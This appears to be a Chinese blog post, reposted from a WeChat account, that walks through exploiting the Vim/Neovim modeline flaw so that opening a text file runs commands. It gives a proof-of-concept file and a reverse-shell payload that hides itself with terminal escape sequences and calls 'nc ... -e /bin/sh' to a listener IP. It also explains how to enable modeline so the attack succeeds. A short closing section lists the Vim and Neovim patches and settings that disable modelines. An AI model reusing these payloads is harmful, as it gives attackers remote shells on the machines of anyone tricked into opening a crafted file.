丢给你一个txt并同时获取你shell

释放双眼,带上耳机,听听看~!

听闻很多人知道这个漏洞,但是有一部分人能复现成功,一部分人复现不出来。这里我就我自己的复现经历给大家演示一下。

git clone https://github.com/numirias/security.git

0x01:复现

 1、kali复现

    桌面新建立一个poc.txt放入以下代码,并用vim执行。

  代码:

:!uname -a||” vi:fen:fdm=expr:fde=assert_fails(“source\!\ \%”):fdl=0:fdt=”

效果图:

成功执行

    反弹shell脚本

    新建立一个shell.txt放入以下代码,Ip跟端口改成你自己的,并用vim执行。

    代码:

\x1b[?7l\x1bSNothing here.\x1b:silent! w | call system(\’nohup nc 192.168.124.14 6666 -e /bin/sh &\’) | redraw! | file | silent! # ” vim: set fen fdm=expr fde=assert_fails(\’set\\ fde=x\\ \\|\\ source\\!\\ \\%\’) fdl=0: \x16\x1b[1G\x16\x1b[KNothing here.”\x16\x1b[D \n


执行后报错:

提示:处理模型行时检测到错误!!

处理方式:


在50行这里添加一个“set modeline” 然后esc保存退出,然后执行

source ~/.vimrc让它生效。

本地开启监听

kali用vim执行txt


本机得到shell

0x02:防范

  • Vim补丁8.1.1365 

    https://github.com/vim/vim/commit/5357552

  • Neovim补丁(在v0.3.6中发布)

    https://github.com/neovim/neovim/pull/10082

    https://github.com/neovim/neovim/releases/tag/v0.3.6


    除了修补之外,建议在vimrc(set nomodeline)中禁用model,使用securemodelines 插件,或者禁用modelineexpr(因为补丁8.1.1366,仅限Vim)以禁用model中的表达式。

本文源自微信公众号:渗透云笔记

人已赞赏
安全工具

小白应知的“黑客术语”

2019-10-16 17:04:48

安全工具

代码审计 | Ecms定制版代码审计实战思路分享

2019-10-16 17:04:52

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索